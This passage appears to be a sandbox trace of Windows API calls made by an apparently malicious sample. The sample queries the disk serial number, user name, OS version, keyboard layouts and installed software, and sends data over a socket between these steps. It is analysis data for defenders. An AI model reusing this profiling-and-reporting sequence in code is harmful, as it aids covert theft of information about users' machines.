IUnknown:Release (This=0x500344) returned 0x1 [0277.943] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e4d0 | out: ppv=0x43e4d0*=0x56e9ed0) returned 0x0 [0277.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x56e9ed0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e6e8 | out: ppvObject=0x43e6e8*=0x0) returned 0x80004002 [0277.944] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56e9ed0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e6f4 | out: ppvObject=0x43e6f4*=0x5a9028) returned 0x0 [0277.944] WbemDefPath:IUnknown:Release (This=0x56e9ed0) returned 0x0 [0277.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e314 | out: ppvObject=0x43e314*=0x5a9028) returned 0x0 [0277.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e2c8 | out: ppvObject=0x43e2c8*=0x0) returned 0x80004002 [0277.945] WbemDefPath:IUnknown:AddRef (This=0x5a9028) returned 0x3 [0277.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43dc24 | out: ppvObject=0x43dc24*=0x0) returned 0x80004002 [0277.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dbd4 | out: ppvObject=0x43dbd4*=0x0) returned 0x80004002 [0277.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dbe0 | out: ppvObject=0x43dbe0*=0x56e9ee0) returned 0x0 [0277.945] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56e9ee0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43dbe8 | out: pCid=0x43dbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0277.945] WbemDefPath:IUnknown:Release (This=0x56e9ee0) returned 0x3 [0277.945] CoGetContextToken (in: pToken=0x43dc40 | out: pToken=0x43dc40) returned 0x0 [0277.945] CoGetContextToken (in: pToken=0x43e054 | out: pToken=0x43e054) returned 0x0 [0277.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0d4 | out: ppvObject=0x43e0d4*=0x0) returned 0x80004002 [0277.945] WbemDefPath:IUnknown:Release (This=0x5a9028) returned 0x2 [0277.945] WbemDefPath:IUnknown:Release (This=0x5a9028) returned 0x1 [0277.945] CoGetContextToken (in: pToken=0x43e9e4 | out: pToken=0x43e9e4) returned 0x0 [0277.945] CoGetContextToken (in: pToken=0x43e944 | out: pToken=0x43e944) returned 0x0 [0277.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9028, riid=0x43ea14*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43ea10 | out: ppvObject=0x43ea10*=0x5a9028) returned 0x0 [0277.946] WbemDefPath:IUnknown:AddRef (This=0x5a9028) returned 0x3 [0277.946] WbemDefPath:IUnknown:Release (This=0x5a9028) returned 0x2 [0277.946] WbemDefPath:IWbemPath:SetText (This=0x5a9028, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x0 [0277.946] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eb90 | out: puCount=0x43eb90*=0x2) returned 0x0 [0277.946] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb8c*=0x0, pszText=0x0 | out: puBuffLength=0x43eb8c*=0xf, pszText=0x0) returned 0x0 [0277.946] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eb8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0277.947] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eb5c | out: puCount=0x43eb5c*=0x2) returned 0x0 [0277.947] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb58*=0x0, pszText=0x0 | out: puBuffLength=0x43eb58*=0xf, pszText=0x0) returned 0x0 [0277.947] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0277.947] IWbemClassObject:Get (in: This=0x5947a8, wszName="SerialNumber", lFlags=0, pVal=0x43eb58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27822f0*=0, plFlavor=0x27822f4*=0 | out: pVal=0x43eb58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EUX7V90VXCES1", varVal2=0x0), pType=0x27822f0*=8, plFlavor=0x27822f4*=0) returned 0x0 [0277.947] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0277.947] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0277.947] IWbemClassObject:Get (in: This=0x5947a8, wszName="SerialNumber", lFlags=0, pVal=0x43eb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27822f0*=8, plFlavor=0x27822f4*=0 | out: pVal=0x43eb60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EUX7V90VXCES1", varVal2=0x0), pType=0x27822f0*=8, plFlavor=0x27822f4*=0) returned 0x0 [0277.948] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0277.948] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0277.950] CoGetContextToken (in: pToken=0x43ea88 | out: pToken=0x43ea88) returned 0x0 [0277.950] IUnknown:Release (This=0x5115f8) returned 0x1 [0277.950] IUnknown:Release (This=0x5115f8) returned 0x0 [0277.990] CoGetContextToken (in: pToken=0x43ea88 | out: pToken=0x43ea88) returned 0x0 [0277.990] IUnknown:Release (This=0x511530) returned 0x1 [0277.990] IUnknown:Release (This=0x511530) returned 0x0 [0278.017] GetUserNameW (in: lpBuffer=0x43e9b8, pcbBuffer=0x43ec30 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x43ec30) returned 1 [0278.032] GetCurrentProcess () returned 0xffffffff [0278.032] GetCurrentThread () returned 0xfffffffe [0278.032] GetCurrentProcess () returned 0xffffffff [0278.033] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x43ebec, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x43ebec*=0x474) returned 1 [0278.033] GetCurrentThreadId () returned 0xfcc [0278.034] OleInitialize (pvReserved=0x0) returned 0x80010106 [0278.064] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0278.079] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0278.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x43eb98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessÝp6ðr_DþÓq\x04ïC", lpUsedDefaultChar=0x0) returned 14 [0278.080] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0278.080] GetCurrentProcess () returned 0xffffffff [0278.080] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x43ebf8 | out: Wow64Process=0x43ebf8*=1) returned 1 [0278.091] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb94 | out: phkResult=0x43eb94*=0x478) returned 0x0 [0278.091] RegQueryValueExW (in: hKey=0x478, lpValueName="ProductName", lpReserved=0x0, lpType=0x43ebb4, lpData=0x0, lpcbData=0x43ebb0*=0x0 | out: lpType=0x43ebb4*=0x1, lpData=0x0, lpcbData=0x43ebb0*=0x2e) returned 0x0 [0278.091] RegQueryValueExW (in: hKey=0x478, lpValueName="ProductName", lpReserved=0x0, lpType=0x43ebb4, lpData=0x2783ac8, lpcbData=0x43ebb0*=0x2e | out: lpType=0x43ebb4*=0x1, lpData="Windows 7 Professional", lpcbData=0x43ebb0*=0x2e) returned 0x0 [0278.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb94 | out: phkResult=0x43eb94*=0x47c) returned 0x0 [0278.092] RegQueryValueExW (in: hKey=0x47c, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x43ebb4, lpData=0x0, lpcbData=0x43ebb0*=0x0 | out: lpType=0x43ebb4*=0x0, lpData=0x0, lpcbData=0x43ebb0*=0x0) returned 0x2 [0278.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x43e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0278.110] CoCreateGuid (in: pguid=0x43e83c | out: pguid=0x43e83c*(Data1=0x2104844, Data2=0x59f5, Data3=0x4a13, Data4=([0]=0x91, [1]=0xfd, [2]=0xfa, [3]=0xd6, [4]=0xe9, [5]=0x13, [6]=0x3a, [7]=0xd))) returned 0x0 [0278.110] CoCreateGuid (in: pguid=0x43e780 | out: pguid=0x43e780*(Data1=0x54447087, Data2=0xf92e, Data3=0x4cc4, Data4=([0]=0xb6, [1]=0x46, [2]=0x33, [3]=0xea, [4]=0x7e, [5]=0xe1, [6]=0x34, [7]=0x16))) returned 0x0 [0278.496] send (s=0x264, buf=0x27a37fe*, len=715, flags=0) returned 715 [0278.496] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 125 [0278.554] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0278.554] GetKeyboardLayoutList (in: nBuff=1, lpList=0x27a3f8c | out: lpList=0x27a3f8c) returned 1 [0278.579] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0x7eb09817, Data2=0x882e, Data3=0x44ba, Data4=([0]=0x84, [1]=0x43, [2]=0x14, [3]=0x90, [4]=0xff, [5]=0x2f, [6]=0xb9, [7]=0xbd))) returned 0x0 [0278.579] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0x2994e914, Data2=0xdab, Data3=0x47f0, Data4=([0]=0xb9, [1]=0xd4, [2]=0xf3, [3]=0x4f, [4]=0xe9, [5]=0x24, [6]=0x9e, [7]=0x95))) returned 0x0 [0278.580] send (s=0x264, buf=0x27a37ff*, len=205, flags=0) returned 205 [0278.580] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 125 [0278.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x480) returned 0x0 [0278.621] RegQueryInfoKeyW (in: hKey=0x480, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x43eb8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x43eb88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x43eb8c*=0x2b, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x43eb88*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x0, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x2, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x3, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x4, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x5, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x6, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x7, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.622] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x8, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x9, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xa, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xb, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xc, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xd, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xe, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0xf, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x10, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x11, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x12, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x13, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x14, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.623] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x15, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x16, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x17, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x18, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x19, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1a, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1b, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1c, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1d, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1e, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x1f, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x20, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.624] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x21, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x22, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x23, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x24, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x25, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] 